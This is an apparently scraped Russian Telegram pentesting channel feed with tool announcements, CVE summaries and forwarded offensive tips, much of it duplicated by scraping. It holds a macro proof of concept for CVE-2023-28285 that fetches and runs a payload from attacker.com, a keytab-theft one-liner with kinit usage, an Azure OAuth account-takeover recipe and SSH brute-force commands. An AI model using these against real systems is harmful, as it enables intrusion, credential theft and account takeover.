Monitorizer
Очередной инструмент поиска поддоменов, вдохновленный subalert. Но у него есть интересная особенность. Он имеет интеграцию с nuclei, Acunetix, Slack.
Интеграция nuclei:
1. По умолчанию интеграцию уже включена, если вы хотите ё выключить, то отредактируйте файл
Интеграция Acunetix:
1. Вам нужно иметь запущенный Acunetix.
2. По умолчанию эта интеграция отключена, чтобы включить ее, необходимо написать
3. На каждый новый найденный поддомен будет создаваться новый инстанс в Acunetix, который будет сканировать таргет.
Интеграция Slack:
Очередной инструмент поиска поддоменов, вдохновленный subalert. Но у него есть интересная особенность. Он имеет интеграцию с nuclei, Acunetix, Slack.
Интеграция nuclei:
1. По умолчанию интеграцию уже включена, если вы хотите ё выключить, то отредактируйте файл
config/default.yaml
2. Nuclei будет пересканировать все поддомены (не только найденные)Интеграция Acunetix:
1. Вам нужно иметь запущенный Acunetix.
2. По умолчанию эта интеграция отключена, чтобы включить ее, необходимо написать
@monitorizer acunetix enable в запущенный monitorizer.3. На каждый новый найденный поддомен будет создаваться новый инстанс в Acunetix, который будет сканировать таргет.
Интеграция Slack:
report:Подготовка окружения:
slack: # required
channel: CM8XXXXXX
token: BZBZBZBBZB-XXXXXXXXXX-ZZZZZZZZZZ-YYYYYYYYYYYYYY
acunetix: # optional
token: 63c19a6da79816b21429e5bb262daed863c19a6da79816b21429e5bb262daed8
host: acunetix.exmaple.com
port: 3443
settings:
nuclei:
enable: true
interval: 86400 # rescan all targets in the watch list every 24h
options: -impact high
sudo pip3 install -r requirements.txt
Запуск мониторинга:python monitor.py -w watch_targets.txtMonitorizer поддерживает более одного инструмента поиска субдоменов для поиска наибольшего количества целей:
scanners = [Также если вам нужно будет подключить API сторонних сервисов/инструментов сохраняйте их сюда:
aiodnsbrute, # https://github.com/blark/aiodnsbrute (included)
subfinder, # https://github.com/subfinder/subfinder (included)
sublist3r, # https://github.com/aboul3la/Sublist3r (included)
dnsrecon, # https://github.com/darkoperator/dnsrecon (included)
dnscan, # https://github.com/rbsec/dnscan (included)
amass, # https://github.com/OWASP/Amass (included)
]
config/thirdparty/*
Запуск инстанса Monitorized:screen -dmS monitorizer bash -c 'python3 monitor.py -w targets.txt'#tools
❤4🔥2
reFlutter
Этот фреймворк помогает в reverse приложений Flutter, используя исправленную версию библиотеки Flutter, которая уже скомпилирована и готова к перепаковке приложений. В этой библиотеке изменен процесс десериализации снимков, что позволяет выполнять DAST в удобной форме.
Установка:
Также вам не нужно устанавливать ни сертификаты, ни root.
Также этот инструмент помогает обходить некоторые реализации flutter certificate pinning.
#tools
Этот фреймворк помогает в reverse приложений Flutter, используя исправленную версию библиотеки Flutter, которая уже скомпилирована и готова к перепаковке приложений. В этой библиотеке изменен процесс десериализации снимков, что позволяет выполнять DAST в удобной форме.
Установка:
pip3 install reflutter
Автор написал очень удобный framework для реверcf Flutter приложений, поэтому использование инструмента фактически однокнопочное:reflutter main.apk
Далее вам нужно настроить анализ трафика приложений в Burp Suite. Также вам не нужно устанавливать ни сертификаты, ни root.
Также этот инструмент помогает обходить некоторые реализации flutter certificate pinning.
#tools
🐳3🔥2🆒2
WordPress BookIt <= 2.3.7 – Authentication Bypass
CVE-2023-2834
Плагин BookIt для WordPress уязвим для обхода аутентификации в версиях до 2.3.7 включительно. Это связано с недостаточной проверкой пользователя при бронировании встречи через плагин. Это позволяет злоумышленникам, не прошедшим проверку подлинности, войти в систему под именем любого существующего на сайте пользователя, например, администратора, если они знают его электронную почту.
Плагин BookIt предоставляет шорткод 'bookit' для встраивания календаря бронирования встреч в страницу на сайте WordPress. Используя эту функциональность, после выбора даты и времени в календаре можно забронировать встречу, указав имя, адрес электронной почты и пароль для регистрации.
Изучение исходного кода показывает, что плагин проверяет идентификатор пользователя на основе адреса электронной почты, указанного через параметр 'email'. Если email принадлежит существующему пользователю WordPress, он свяжет запрос с этим пользователем и установит для него аутентификационные cookies.
К сожалению, эта функциональность была реализована небезопасно, поскольку она не включает никаких проверок подлинности, таких как проверка пароля. Она просто ищет личность и разрешает это действие без надлежащей проверки и аутентификации.
Это дает возможность злоумышленникам обойти аутентификацию и получить доступ к произвольным учетным записям на сайтах с уязвимой версией плагина. Как всегда, это позволяет злоумышленникам полностью скомпрометировать уязвимый сайт WordPress и заразить атакуемый сервер.
#CVE
CVE-2023-2834
Плагин BookIt для WordPress уязвим для обхода аутентификации в версиях до 2.3.7 включительно. Это связано с недостаточной проверкой пользователя при бронировании встречи через плагин. Это позволяет злоумышленникам, не прошедшим проверку подлинности, войти в систему под именем любого существующего на сайте пользователя, например, администратора, если они знают его электронную почту.
Плагин BookIt предоставляет шорткод 'bookit' для встраивания календаря бронирования встреч в страницу на сайте WordPress. Используя эту функциональность, после выбора даты и времени в календаре можно забронировать встречу, указав имя, адрес электронной почты и пароль для регистрации.
Изучение исходного кода показывает, что плагин проверяет идентификатор пользователя на основе адреса электронной почты, указанного через параметр 'email'. Если email принадлежит существующему пользователю WordPress, он свяжет запрос с этим пользователем и установит для него аутентификационные cookies.
К сожалению, эта функциональность была реализована небезопасно, поскольку она не включает никаких проверок подлинности, таких как проверка пароля. Она просто ищет личность и разрешает это действие без надлежащей проверки и аутентификации.
Это дает возможность злоумышленникам обойти аутентификацию и получить доступ к произвольным учетным записям на сайтах с уязвимой версией плагина. Как всегда, это позволяет злоумышленникам полностью скомпрометировать уязвимый сайт WordPress и заразить атакуемый сервер.
#CVE
Forwarded from SHADOW:Group
На сайтах, где идентификация идет по Email и есть возможность войти через Microsoft OAuth есть риск захвата аккаунта.
Дело в том, что Azure не проверяет установленную в аккаунте почту, что позволяет вам указать почту жертвы и войти на уязвимый сайт через OAUTH от ее имени.
- Жертва регается на сайте через свою почту.
- Заходим в Azure AD и меняем свою почту на почту жертвы.
- Заходим на сайт через Microsoft OAuth и получаем доступ к аккаунту жертвы.
Видео PoC
#web #ato #oauth
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
nOAuth | OAuth Implementation Flaw Affecting Azure AD OAuth Applications
nOAuth is an authentication implementation flaw that can affect Microsoft Azure AD multi-tenant OAuth applications. This demo video explains how the misconfiguration can lead to full account takeover and how to prevent it.
This blog on nOAuth has more details:…
This blog on nOAuth has more details:…
Forwarded from RedTeam brazzers (Миша)
Кража KeyTab.
Во время тестирования на проникновение часто встречаются системы Linux с настроенным Keytab. Keytab хранит пары принципала кербероса и его зашифрованных ключей. С помощью этих зашифрованных ключей можно получить TGT. В результате чего появляется возможность запросить TGT на имя принципала без ввода пароля. Kerberos на Linux уже далеко не редкость - гетерогенные сети становятся все более популярными по ряду причин. Например, может быть такой сценарий, что на Linux бекапится содержимое какой-либо шары, при этом получить доступ к этой шаре могут только пользователи домена. В таком случае пишется простенький скрипт на баш, в котором реализуется логика по запросу TGT тикета на основе KeyTab, а затем копирования файлов с шары. Причем для периодичности запуска скрипт добавляется в crontab.
Нам, как атакующим, конечно же, интересен процесс запроса TGT билета на основе KeyTab. Для этого можно использовать команду kinit со следующим синтаксисом:
Остается лишь одна проблема - обнаружение самих KeyTab файлов. Конечно, можно ручками через find искать эти файлы, потом также муторно проверять разрешения на них, что не есть хорошо. Поэтому я накалякал следующий командлет, который автоматически найдет все
1. Зеленым подсвечиваются те файлы, которые принадлежат текущему пользователю.
2. Желтым подсвечиваются те файлы, которые принадлежат пользователю, отличному от текущего, при этом текущий пользователь не имеет достаточных прав (чтение/запись) на этот самый KeyTab.
3. Наконец, красным подсвечиваются файлы, которые принадлежат пользователю, отличному от текущего, при этом текущий пользователь имеет достаточные права на этот самый KeyTab.
Во время тестирования на проникновение часто встречаются системы Linux с настроенным Keytab. Keytab хранит пары принципала кербероса и его зашифрованных ключей. С помощью этих зашифрованных ключей можно получить TGT. В результате чего появляется возможность запросить TGT на имя принципала без ввода пароля. Kerberos на Linux уже далеко не редкость - гетерогенные сети становятся все более популярными по ряду причин. Например, может быть такой сценарий, что на Linux бекапится содержимое какой-либо шары, при этом получить доступ к этой шаре могут только пользователи домена. В таком случае пишется простенький скрипт на баш, в котором реализуется логика по запросу TGT тикета на основе KeyTab, а затем копирования файлов с шары. Причем для периодичности запуска скрипт добавляется в crontab.
Нам, как атакующим, конечно же, интересен процесс запроса TGT билета на основе KeyTab. Для этого можно использовать команду kinit со следующим синтаксисом:
kinit –kt <keytab> <принципал>
Например, если файл /tmp/admin.keytab служит для аутентификации пользователя admin@OFFICE.LOCAL , то делаем вот так:kinit -kt /tmp/admin.keytab admin@OFFICE.LOCAL Остается лишь одна проблема - обнаружение самих KeyTab файлов. Конечно, можно ручками через find искать эти файлы, потом также муторно проверять разрешения на них, что не есть хорошо. Поэтому я накалякал следующий командлет, который автоматически найдет все
.keytab файлы , а затем подсветит интересные разными цветами:1. Зеленым подсвечиваются те файлы, которые принадлежат текущему пользователю.
2. Желтым подсвечиваются те файлы, которые принадлежат пользователю, отличному от текущего, при этом текущий пользователь не имеет достаточных прав (чтение/запись) на этот самый KeyTab.
3. Наконец, красным подсвечиваются файлы, которые принадлежат пользователю, отличному от текущего, при этом текущий пользователь имеет достаточные права на этот самый KeyTab.
find / -iname '*.keytab' -type f -exec ls -l {} \; 2>/dev/null | awk -v user="$(whoami)" 'BEGIN { FS = OFS = " "; red = "\033[31m"; yellow = "\033[33m"; green = "\033[32m"; reset = "\033[0m" } { if ($3 == user && $9 ~ /.keytab$/) { printf green } else if ($3 != user && $9 ~ /.keytab$/ && $1 ~ /^-.w.r../) { printf red } else if ($3 != user && $9 ~ /.keytab$/ && ($1 !~ /^.w.r../ || $1 !~ /^-.w../)) { printf yellow } print $0; printf reset }'👏4❤1
Forwarded from Hack IT Easy
PEN-200-2023.pdf
49.2 MB
PEN-200-2023 💻
Наконец появилось то, что так долго ждали - обновленный курс OSCP. Мне новая методичка понравилась гораздо больше, чем предыдущая. Структурированный материал. Видна работа методологов.
Забираем и наслаждаемся.
Наконец появилось то, что так долго ждали - обновленный курс OSCP. Мне новая методичка понравилась гораздо больше, чем предыдущая. Структурированный материал. Видна работа методологов.
Забираем и наслаждаемся.
🔥6❤1🤝1
msLDAPDump
LDAP Enumeration Tool. msLDAPDump упрощает перечисление LDAP в домене, превращая библиотеку lpap3 из Python в простой в использовании интерфейс. Как и большинство инструментов, этот лучше всего работает под Windows. Если используется Unix, инструмент не будет определять имена хостов, которые в настоящее время недоступны через eth0.
#tools
LDAP Enumeration Tool. msLDAPDump упрощает перечисление LDAP в домене, превращая библиотеку lpap3 из Python в простой в использовании интерфейс. Как и большинство инструментов, этот лучше всего работает под Windows. Если используется Unix, инструмент не будет определять имена хостов, которые в настоящее время недоступны через eth0.
#tools
❤2
Media is too big
VIEW IN TELEGRAM
Microsoft 365 MSO 2305 Build 16.0.16501.20074 Remote Code Execution
CVE-2023-28285
Сама атака осуществляется локально пользователем, имеющим аутентификацию на целевой системе. Злоумышленник может использовать уязвимость путем убеждения жертвы с помощью социальной инженерии загрузить и открыть специально созданный файл с веб-сайта, что может привести к локальной
атаку на компьютер жертвы. Злоумышленник может убедить жертву открыть вредоносную веб-страницу, используя вредоносный файл
PoC:
CVE-2023-28285
Сама атака осуществляется локально пользователем, имеющим аутентификацию на целевой системе. Злоумышленник может использовать уязвимость путем убеждения жертвы с помощью социальной инженерии загрузить и открыть специально созданный файл с веб-сайта, что может привести к локальной
атаку на компьютер жертвы. Злоумышленник может убедить жертву открыть вредоносную веб-страницу, используя вредоносный файл
Word для Office-365 API. После того, как пользователь откроет файл, чтобы прочитать его, из API Office-365, не будучи спрошенным, что он хочет активировать, и т.д., он активирует код вредоносного сервера, который он внедрит сам, с этого вредоносного сервера. После этого клика, злоумышленник может получить конфиденциальную информацию!PoC:
Sub AutoOpen()#CVE #RCE #POC #Microsoft
Call Shell("cmd.exe /S /c" & "curl -s
http://attacker.com/CVE-2023-28285/PoC.debelui | debelui", vbNormalFocus)
End Sub
Cbrutekrag
Написанный на C инструмент для брутфорса SSH серверов с помощью словарей.
Сборка:
Написанный на C инструмент для брутфорса SSH серверов с помощью словарей.
Сборка:
git clone --depth=1 https://github.com/matricali/cbrutekrag.gitИспользование:
cd cbrutekrag
make
make install
cbrutekrag -T targets.txt -C combinations.txt -o result.log#tools
cbrutekrag -s -t 8 -C combinations.txt -o result.log 192.168.1.0/24
❤7
Этим вечером хочу порекомендовать вам быстро развивающийся канал коллеги по цеху, который активно улучшает и создает контент для нашего с вами комьюнити. Многим из вас думаю понравиться его стиль и ход мыслей)
Присоединиться
Присоединиться
🗿1
Firefly
Firefly - это продвинутый fuzzer, а не просто инструмент для bruteforce. Firefly дает преимущество тестирования цели с помощью большого количества встроенных тестов для обнаружения поведения цели. Firefly находится на первых стадия разработки, но работает корректно. Данный инструмент имеет огромное количество интересных преимуществ.
Установка:
#tools
Firefly - это продвинутый fuzzer, а не просто инструмент для bruteforce. Firefly дает преимущество тестирования цели с помощью большого количества встроенных тестов для обнаружения поведения цели. Firefly находится на первых стадия разработки, но работает корректно. Данный инструмент имеет огромное количество интересных преимуществ.
Установка:
go install -v github.com/Brum3ns/firefly/cmd/firefly@latestСборка:
git clone https://github.com/Brum3ns/firefly.gitБазовое использование:
cd firefly/
go build cmd/firefly/firefly.go
./firefly -h
firefly -hПродвинутое использование:
firefly -u 'http://example.com/?query=FUZZ'
firefly -u 'http://example.com/?query=FUZZ' --timeout 7000Поддержка GET запросов
firefly -u 'http://example.com/?query=FUZZ' -m GET,POST,PUT -p https,http,ws
echo 'http://example.com/?query=FUZZ' | firefly
firefly -r 'Поддержка POST запросов
GET /?query=FUZZ HTTP/1.1
Host: example.com
User-Agent: FireFly'
firefly -r 'Верификация результата
POST /?A=1 HTTP/1.1
Host: example.com
User-Agent: Firefly
X-Host: FUZZ
B=2&C=3' -au replace
firefly -u 'http://example.com/?query=FUZZ' -eСохранение результатов:
firefly -u 'http://example.com/?query=FUZZ' -o file.txtУ инструмента ещё много функций, которые мне не удалось уместить в статью, так что пользуйтесь на здоровье и читайте документацию)
firefly -u 'http://example.com/?query=FUZZ' -oJ file.json
#tools
❤4🔥4🎉2🆒1
🔵Firejail
Firejail - это программа-песочница SUID, которая снижает риск нарушения безопасности, ограничивая среду выполнения ненадежных приложений с использованием пространств имен Linux, seccomp-bpf и возможностей Linux. Она позволяет процессу и всем его потомкам иметь свой собственный частный вид общих ресурсов ядра, таких как сетевой стек, таблица процессов, таблица монтирования. Firejail может работать в среде SELinux или AppArmor и интегрирован с группами управления Linux.
Написанное на C с практически отсутствующими зависимостями программное обеспечение работает на любом компьютере Linux с версией ядра 3.x или новее. Оно может создавать песочницу для любого типа процессов: серверов, графических приложений и даже пользовательских сеансов входа в систему. Программное обеспечение включает профили песочницы для ряда более распространенных программ Linux, таких как Mozilla Firefox, Chromium, VLC, Transmission и т.д.
Песочница легкая, накладные расходы низкие. Нет сложных файлов конфигурации для редактирования, нет открытых соединений сокетов, нет демонов, работающих в фоновом режиме. Все функции безопасности реализованы непосредственно в ядре Linux и доступны на любом компьютере Linux.
Установка:
Firejail - это программа-песочница SUID, которая снижает риск нарушения безопасности, ограничивая среду выполнения ненадежных приложений с использованием пространств имен Linux, seccomp-bpf и возможностей Linux. Она позволяет процессу и всем его потомкам иметь свой собственный частный вид общих ресурсов ядра, таких как сетевой стек, таблица процессов, таблица монтирования. Firejail может работать в среде SELinux или AppArmor и интегрирован с группами управления Linux.
Написанное на C с практически отсутствующими зависимостями программное обеспечение работает на любом компьютере Linux с версией ядра 3.x или новее. Оно может создавать песочницу для любого типа процессов: серверов, графических приложений и даже пользовательских сеансов входа в систему. Программное обеспечение включает профили песочницы для ряда более распространенных программ Linux, таких как Mozilla Firefox, Chromium, VLC, Transmission и т.д.
Песочница легкая, накладные расходы низкие. Нет сложных файлов конфигурации для редактирования, нет открытых соединений сокетов, нет демонов, работающих в фоновом режиме. Все функции безопасности реализованы непосредственно в ядре Linux и доступны на любом компьютере Linux.
Установка:
sudo add-apt-repository ppa:deki/firejailСборка:
sudo apt-get update
sudo apt-get install firejail firejail-profiles
git clone https://github.com/netblue30/firejail.git
cd firejail
./configure && make && sudo make install-strip
Запуск различных приложений:firejail firefox # запуск Mozilla Firefox#tools
firejail transmission-gtk # запуск Transmission BitTorrent
firejail vlc # запуск VideoLAN Client
sudo firejail /etc/init.d/nginx start
🔥8⚡1
Forwarded from Что-то на пентестерском
Привет! Году в 2019-2020 вышло исследование на тему данной атаки, она может применяется в вебе, тем самым можно получить RCE, данная атака принимается и в баг баунти
Автор этой атаки получил таким образом RCE в 35 компаний, давай разберемся в чем ее суть и как работает
ЧТНП | #web
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡5❤3
Forwarded from BI.ZONE Bug Bounty
Публичная программа «Тинькофф» на BI.ZONE Bug Bounty выходит на новый уровень.
В скоупе теперь open-source код некоторых разработок компании: OpenAPI, мобильные SDK, бэкенд-фреймворки и многое другое.
Смотрите полный список на сайте платформы — и вперед за баунти!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3❤🔥2👍2🌚1
Forwarded from NETRUNNER GROUP (Tripini FKYL)
И мы снова готовы вас шокировать ⛈
❤️ Мы готовим полномасштабный проект, сериал о специалистах отдела безопасности в крупной фирме и их жизненные ситуации расказывающие об основных ошибках в безопасности компаний.
Сценарий уже почти готов, вносятся последние правки.
💀 Киллер фичей будет являться то что будут показаны реальные способы атак и их описание.
Сериал будет интересен как знающим, так и простым обывателям.
😈 Техническую поддержку нам будут обеспечивать наши любимые друзья и партнеры RESOLUTE ATTACK
Список платформ куда выйдут серии (как минимум) :
Youtube
Rutube
Dzen
P.S. Хотите фото со сьемок?)
Сценарий уже почти готов, вносятся последние правки.
Сериал будет интересен как знающим, так и простым обывателям.
Список платформ куда выйдут серии (как минимум) :
Youtube
Rutube
Dzen
P.S. Хотите фото со сьемок?)
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15❤2🥰1🌚1
Forwarded from Bounty On Coffee
Пентест или багбаунти?
Для меня, как для человека, который занимается пентестами почти 5 лет, а также 4 года багхантит, видны плюсы и минусы обоих способов защиты своих систем.
Давайте разберем их.
Для компаний, которые хотят защитить свои сервисы оба этих способа нужно держать в своем арсенале, так как являются взаимодополняемыми.
У меня есть масса примеров, которые это доказывают.
Например, очень часто бывало и бывает такое, что нам на пентест прилетает проект, который уже давно на багбаунти в котором и я участвовал. И перед проектом возникают мысли, ведь столько людей уже тестировали этот сервис, было найдено куча багов и наверняка проект будет скучным. Но нет, в 99% случаях на пентесте находится десятки багов в том числе и баги с высоким риском. Один из таких багов, буду сдавать на award.awillix.ru
Почему же так случается?
И мы не говорим сейчас о каких-либо внутренних сервисах, тестировать которые можно только на пентестах.
Чаще всего на багбаунти сервис не изучают под микроскопом, не тестируют каждый API эндпоинт детально. И поверьте мне из-за этого упускаются очень много багов.
✅Плюсы пентеста
– Ограниченный скоуп. Это помогает фокусироваться на нужных вещах, а не бегать от одного к другому.
– Команда. Относительно предоставленного скоупа мы можем выбрать на проект людей относительно их скиллов. Также командный взлом более эффективен.
– Дополнительная информация. На пентестах идет плотное взаимодействие с клиентом, клиент может предоставить документацию, сваггер..., что тоже тестирование делает более эффективным
– Доступ к любым сервисам в пределах скоупа. Некоторый функционал бывает немного затруднительно тестировать, например, кредиты в банках или есть хорошо настроенные вафы, которые сильно мешают. На пентестах же нам могут выдать тестовые стенды или добавить в вайтлисты для полноценного тестирование нужного функционала.
⛔️Минусы пентеста
– Ограниченное время. Тут есть риск, что во время пентеста мы не можем себе позволить долго сконцентрироваться на чем-то одном. Например, если есть интересная зацепка, но раскрутить ее сходу не получается. Если это в каком-то софте, то можно отдельно поресерчить.
Ограниченное время я бы не назвал даже каким-то существенным минусом, часто это помогает нам сконцентрироваться на скоупе, которое мы исследуем во время пентеста.
✅Плюсы багбаунти
– Огромное количество хантеров с различными скиллами. Один из самых больших плюсов багбаунти – это огромная банда хантеров с различными скиллами. Особенно это бывает полезно, если есть что-то специфическое.
– Неограниченное время. Багхантер не ограничен по времени и может хоть месяц ломать то, что захочет.
– Компания платит только за баг, который нашли. Для компаний хороший способ сэкономить.
⛔️Минусы багбаунти
– Ограничения в действиях. Багхантер не может пробить периметр и дальше идти ломать внутрянку. Также, если мы только занимаемся багхантерством, то есть риск, что знания в постэксплуатации будут слабыми.
– Отсутствие дополнительной информации.
– Отсутствие доступа к некоторым сервисам. Тут тоже достаточно все очевидно, у многих ли хантеров юридические лица? Но в то же время и плюс для тех, у кого это есть, например, можно снять все сливки с юридических сервисов, если запарится и сделать себе ИП.
Учитывая все эти факторы получаем идеальную взаимодополняемость обоих способов.
Для меня, как для человека, который занимается пентестами почти 5 лет, а также 4 года багхантит, видны плюсы и минусы обоих способов защиты своих систем.
Давайте разберем их.
Для компаний, которые хотят защитить свои сервисы оба этих способа нужно держать в своем арсенале, так как являются взаимодополняемыми.
У меня есть масса примеров, которые это доказывают.
Например, очень часто бывало и бывает такое, что нам на пентест прилетает проект, который уже давно на багбаунти в котором и я участвовал. И перед проектом возникают мысли, ведь столько людей уже тестировали этот сервис, было найдено куча багов и наверняка проект будет скучным. Но нет, в 99% случаях на пентесте находится десятки багов в том числе и баги с высоким риском. Один из таких багов, буду сдавать на award.awillix.ru
Почему же так случается?
И мы не говорим сейчас о каких-либо внутренних сервисах, тестировать которые можно только на пентестах.
Чаще всего на багбаунти сервис не изучают под микроскопом, не тестируют каждый API эндпоинт детально. И поверьте мне из-за этого упускаются очень много багов.
✅Плюсы пентеста
– Ограниченный скоуп. Это помогает фокусироваться на нужных вещах, а не бегать от одного к другому.
– Команда. Относительно предоставленного скоупа мы можем выбрать на проект людей относительно их скиллов. Также командный взлом более эффективен.
– Дополнительная информация. На пентестах идет плотное взаимодействие с клиентом, клиент может предоставить документацию, сваггер..., что тоже тестирование делает более эффективным
– Доступ к любым сервисам в пределах скоупа. Некоторый функционал бывает немного затруднительно тестировать, например, кредиты в банках или есть хорошо настроенные вафы, которые сильно мешают. На пентестах же нам могут выдать тестовые стенды или добавить в вайтлисты для полноценного тестирование нужного функционала.
⛔️Минусы пентеста
– Ограниченное время. Тут есть риск, что во время пентеста мы не можем себе позволить долго сконцентрироваться на чем-то одном. Например, если есть интересная зацепка, но раскрутить ее сходу не получается. Если это в каком-то софте, то можно отдельно поресерчить.
Ограниченное время я бы не назвал даже каким-то существенным минусом, часто это помогает нам сконцентрироваться на скоупе, которое мы исследуем во время пентеста.
✅Плюсы багбаунти
– Огромное количество хантеров с различными скиллами. Один из самых больших плюсов багбаунти – это огромная банда хантеров с различными скиллами. Особенно это бывает полезно, если есть что-то специфическое.
– Неограниченное время. Багхантер не ограничен по времени и может хоть месяц ломать то, что захочет.
– Компания платит только за баг, который нашли. Для компаний хороший способ сэкономить.
⛔️Минусы багбаунти
– Ограничения в действиях. Багхантер не может пробить периметр и дальше идти ломать внутрянку. Также, если мы только занимаемся багхантерством, то есть риск, что знания в постэксплуатации будут слабыми.
– Отсутствие дополнительной информации.
– Отсутствие доступа к некоторым сервисам. Тут тоже достаточно все очевидно, у многих ли хантеров юридические лица? Но в то же время и плюс для тех, у кого это есть, например, можно снять все сливки с юридических сервисов, если запарится и сделать себе ИП.
Учитывая все эти факторы получаем идеальную взаимодополняемость обоих способов.
⚡6🔥4👍2
Active Directory глазами Impacket
При аудите Windows-инфраструктур Impacket является швейцарским ножом, позволяя активно взаимодействовать с устройствами по сети, для которых проприетарным (родным или умолчательным) инструментом, конечно же, является, PowerShell. Но так уж сложилось, что использовать последний из-под Linux – не лучшая практика, с учётом имеющихся для этого open source решений. Будучи написанным на возлюбленном в IT-сообществе Python, Impacket оставляет только положительные эмоции от использования, а также информативные и полезные результаты, а в некоторых случаях позволяет и вовсе окончить аудит, став администратором домена. Целью статьи является показать возможности рассматриваемого программного обеспечения на примере реальной сети под управлением Active Directory, и подсветить наиболее сильные его стороны. Формат статьи – обзор входящих в его состав сценариев с практическими примерами, которые в наименьшей мере заимствуется из аналогичных иностранных публикаций. Статья носит обзорный ознакомительный характер, демонстрируя возможности применения Impacket, и адаптирована особенно для тех, кто в теме информационной безопасности, знаком с Windows Server не понаслышке, и при этом рассматриваемыми скриптами толком ещё не пользовался.
#tools #AD
При аудите Windows-инфраструктур Impacket является швейцарским ножом, позволяя активно взаимодействовать с устройствами по сети, для которых проприетарным (родным или умолчательным) инструментом, конечно же, является, PowerShell. Но так уж сложилось, что использовать последний из-под Linux – не лучшая практика, с учётом имеющихся для этого open source решений. Будучи написанным на возлюбленном в IT-сообществе Python, Impacket оставляет только положительные эмоции от использования, а также информативные и полезные результаты, а в некоторых случаях позволяет и вовсе окончить аудит, став администратором домена. Целью статьи является показать возможности рассматриваемого программного обеспечения на примере реальной сети под управлением Active Directory, и подсветить наиболее сильные его стороны. Формат статьи – обзор входящих в его состав сценариев с практическими примерами, которые в наименьшей мере заимствуется из аналогичных иностранных публикаций. Статья носит обзорный ознакомительный характер, демонстрируя возможности применения Impacket, и адаптирована особенно для тех, кто в теме информационной безопасности, знаком с Windows Server не понаслышке, и при этом рассматриваемыми скриптами толком ещё не пользовался.
#tools #AD
❤2🔥2🐳1
FVWA (Flask Vulnerable Web Application)
Мой хороший знакомый зарелизил свою лабу для тренировки веб уязвимостей. Поддержим его начинания!
Приложение содержит несколько заданий, в каждом из которых реализован некоторый изъян в безопасности (будь то слабый пароль, SQL-инъекция или XXE). Вы смело можете искать нестандартные пути решения, знакомиться с новыми для себя средствами анализа защищённости веб-приложений, пробовать различные полезные нагрузки и, главное, смотреть исходный код, позволяющий увидеть причину возникновения обнаруженной вами уязвимости.
Мы сделали минималистичную борду для сдачи флагов, а это значит, что вы сможете поделиться своими результатами с другими энтузиастами, обсудить интересные находки или поделиться способом решения)
Так что добро пожаловать в FVWA, лабораторию, где мы стараемся создать возможности для всех, кто хочет и стремится стать лучше в сфере веб-безопасности.
#тренировка
Мой хороший знакомый зарелизил свою лабу для тренировки веб уязвимостей. Поддержим его начинания!
Приложение содержит несколько заданий, в каждом из которых реализован некоторый изъян в безопасности (будь то слабый пароль, SQL-инъекция или XXE). Вы смело можете искать нестандартные пути решения, знакомиться с новыми для себя средствами анализа защищённости веб-приложений, пробовать различные полезные нагрузки и, главное, смотреть исходный код, позволяющий увидеть причину возникновения обнаруженной вами уязвимости.
Мы сделали минималистичную борду для сдачи флагов, а это значит, что вы сможете поделиться своими результатами с другими энтузиастами, обсудить интересные находки или поделиться способом решения)
Так что добро пожаловать в FVWA, лабораторию, где мы стараемся создать возможности для всех, кто хочет и стремится стать лучше в сфере веб-безопасности.
#тренировка
⚡8🆒2👏1🐳1